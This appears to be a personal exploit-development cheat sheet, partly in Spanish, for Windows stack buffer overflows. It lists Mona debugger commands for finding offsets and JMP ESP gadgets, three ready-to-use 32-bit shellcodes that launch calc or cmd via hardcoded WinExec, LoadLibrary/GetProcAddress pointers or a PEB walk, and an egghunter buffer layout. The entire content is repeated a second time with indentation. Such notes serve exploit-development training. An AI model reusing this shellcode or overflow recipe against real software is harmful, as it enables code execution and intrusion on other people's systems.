adon90/exploiting.txt

## exploiting.txt
Mona tricks:
---------------
!mona pc 1000  -> Launch exploit with pattern
!mona findmsp  -> autocalculate offset, ESP size.....

No jmp esp in Exec Region (.text) but no DEP:

!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------


SHELLCODES


1. WinExec Hardcoded


arwin kernel32 WinExec

--------------------------

shellcode = ("\x33\xc0"
"\x50"
"\x68\x2E\x65\x78\x65" #.exe
"\x68\x63\x61\x6C\x63" #calc
"\x8B\xC4"
"\x6A\x01"
"\x50"
"\xBB\xED\x2A\x86\x7C" # arwin extracted WinExec address
"\xFF\xD3")
-------------------------------------
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://github.com/73696e65/windows-exploits/blob/master/arwin.exe


2. GetProcess Address + LoadLibrary (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"))


Buscar los punteros en .rdata a GetProcAddress y LoadLibrary a partir del EntryPoint:

Search For > Name in all Modules

Buscar la direccion del puntero en Follow in Dump y usarla como puntero.

------------------------------------------------

shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51"  # push ecx
shellcode += "\x68\x2e\x64\x6c\x6c" # .dll
shellcode += "\x68\x65\x6c\x33\x32" # el32
shellcode += "\x68\x6b\x65\x72\x6e" # kern
shellcode += "\x54" # PUSH ESP
shellcode += "\xff\x15\x7b\x1d\x80\x7c" # *LoadLibrary
shellcode += "\x68\x78\x65\x63\x20" # xec
shellcode += "\x68\x57\x69\x6e\x45" # wine
shellcode += "\x54" # push esp
shellcode += "\x50" # push eax (Retorno LoadLibrary Kernel32)
shellcode += "\xff\x15\x40\xae\x80\x7c" # *GetProcessAddress
shellcode += "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x2e\x65\x78\x65" #.exe
shellcode += "\x68\x63\x61\x6c\x63" # calc
shellcode += "\x54" # PUSH ESP
shellcode += "\xff\xd0" # call eax (eax es el retorno de GetProcessAddress)

------------------------------------------------------


3. WinExec extraída del PEB

----------------------------------------------------------

shellcode =("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd"
        "\x68\x63\x6d\x64\x20" # payload (cmd )
        "\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7")

  ---------------------------------------------------------
https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/


Egghunter
------------

evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 +  jmp_esp + "\xE9\xC0\xFF\xFF\xFF"

Important to put NOPS between the hunter and the JMP ESP.
	Mona tricks:
	---------------
	!mona pc 1000 -> Launch exploit with pattern
	!mona findmsp -> autocalculate offset, ESP size.....

	No jmp esp in Exec Region (.text) but no DEP:

	!mona asm -s "jmp esp"
	!mona find -s "\xff\xe4" -m <module>
	-----------------


	SHELLCODES


	1. WinExec Hardcoded


	arwin kernel32 WinExec

	--------------------------

	shellcode = ("\x33\xc0"
	"\x50"
	"\x68\x2E\x65\x78\x65" #.exe
	"\x68\x63\x61\x6C\x63" #calc
	"\x8B\xC4"
	"\x6A\x01"
	"\x50"
	"\xBB\xED\x2A\x86\x7C" # arwin extracted WinExec address
	"\xFF\xD3")
	-------------------------------------
	http://www.fuzzysecurity.com/tutorials/expDev/6.html
	https://github.com/73696e65/windows-exploits/blob/master/arwin.exe


	2. GetProcess Address + LoadLibrary (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"))


	Buscar los punteros en .rdata a GetProcAddress y LoadLibrary a partir del EntryPoint:

	Search For > Name in all Modules

	Buscar la direccion del puntero en Follow in Dump y usarla como puntero.

	------------------------------------------------

	shellcode = "\x31\xC9" # xor ecx,ecx
	shellcode += "\x51" # push ecx
	shellcode += "\x68\x2e\x64\x6c\x6c" # .dll
	shellcode += "\x68\x65\x6c\x33\x32" # el32
	shellcode += "\x68\x6b\x65\x72\x6e" # kern
	shellcode += "\x54" # PUSH ESP
	shellcode += "\xff\x15\x7b\x1d\x80\x7c" # *LoadLibrary
	shellcode += "\x68\x78\x65\x63\x20" # xec
	shellcode += "\x68\x57\x69\x6e\x45" # wine
	shellcode += "\x54" # push esp
	shellcode += "\x50" # push eax (Retorno LoadLibrary Kernel32)
	shellcode += "\xff\x15\x40\xae\x80\x7c" # *GetProcessAddress
	shellcode += "\x31\xC9" # xor ecx,ecx
	shellcode += "\x51" # push ecx
	shellcode += "\x68\x2e\x65\x78\x65" #.exe
	shellcode += "\x68\x63\x61\x6c\x63" # calc
	shellcode += "\x54" # PUSH ESP
	shellcode += "\xff\xd0" # call eax (eax es el retorno de GetProcessAddress)

	------------------------------------------------------


	3. WinExec extraída del PEB

	----------------------------------------------------------

	shellcode =("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
	"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
	"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
	"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
	"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
	"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
	"\x45\x81\x3e\x43\x72\x65\x61\x75"
	"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
	"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
	"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
	"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
	"\xb1\xff\x53\xe2\xfd"
	"\x68\x63\x6d\x64\x20" # payload (cmd )
	"\x89\xe2\x52\x52\x53\x53"
	"\x53\x53\x53\x53\x52\x53\xff\xd7")

	---------------------------------------------------------
	https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
	https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/


	Egghunter
	------------

	evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 + jmp_esp + "\xE9\xC0\xFF\xFF\xFF"

	Important to put NOPS between the hunter and the JMP ESP.